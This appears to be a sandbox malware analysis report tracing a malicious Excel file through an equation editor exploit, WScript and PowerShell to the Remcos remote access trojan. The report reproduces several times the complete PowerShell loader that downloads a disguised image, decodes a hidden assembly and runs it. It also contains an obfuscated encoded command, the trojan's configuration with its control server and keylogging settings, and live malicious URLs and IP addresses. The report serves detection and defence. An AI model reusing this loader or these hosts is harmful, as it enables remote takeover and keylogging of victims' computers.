            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1648, Protocol: tcp, SourceIp: 54.241.153.192, SourceIsIpv6: false, SourcePort: 80
            Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1648, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , ProcessId: 3400, ProcessName: wscript.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1648, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1668, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3508, TargetFilename: C:\Users\user\AppData\Local\Temp\mzbur00x.4zp.ps1

            Data Obfuscation

            barindex
            Sigma detected: Powershell download and load assembly
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: CC C0 05 F8 36 77 FF 59 27 3F 52 CE FC 6B 29 F4 01 51 C6 7F D4 F9 81 6A A4 65 7F 05 A3 94 9F E7 97 F1 FE 17 20 A1 AD 1D 85 9E 4E 18 7D 5C 23 79 AD E1 C1 0E 06 23 D4 2A 0B 82 5C BA BD 87 A8 1F E6 3B 36 83 8F E7 02 1D C7 DD 21 B7 96 67 AA 0D B6 E4 7B EA 7A 65 6B D5 78 8A 95 65 C7 B4 90 4A 85 E2 73 85 16 4A 78 E7 49 AF 8E 2F 63 5C F9 16 16 23 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3972, TargetObject: HKEY_CURRENT_USER\Software\Rmc-999Z97\exepath

            Snort Signatures

            Timestamp:05/27/24-09:00:53.917151
            SID:2049038
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:51.165055
            SID:2018856
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:51.165055
            SID:2047750
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:58.159972
            SID:2020424
            Source Port:80
            Destination Port:49175
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:58.159972
            SID:2020423
            Source Port:80
            Destination Port:49175
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:53.346879
            SID:2025012
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
            Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
            Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Found malware configuration
            Source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for domain / URL
            Source: sembe.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
            Source: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.docVirustotal: Detection: 7%Perma Link
            Source: http://198.46.178.154/100500/HWE.txtVirustotal: Detection: 7%Perma Link
            Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Virustotal: Detection: 12%Perma Link
            Source: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpjVirustotal: Detection: 7%Perma Link
            Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
            Source: sembe.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Ref19920830281982938RT.xlsVirustotal: Detection: 7%Perma Link
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00433837
            Source: powershell.exe, 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2f5b1223-3

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.46.178.154 Port: 80Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
            Source: ~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp.4.drStream path '_1778283989/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp.4.drStream path '_1778283994/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

            Privilege Escalation

            barindex
            Contains functionality to bypass UAC (CMSTPLUA)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004074FD _wcslen,CoGetObject,17_2_004074FD
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.2
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: uploaddeimagens.com.br
            Source: global trafficDNS query: name: sembe.duckdns.org
            Source: global trafficDNS query: name: sembe.duckdns.org
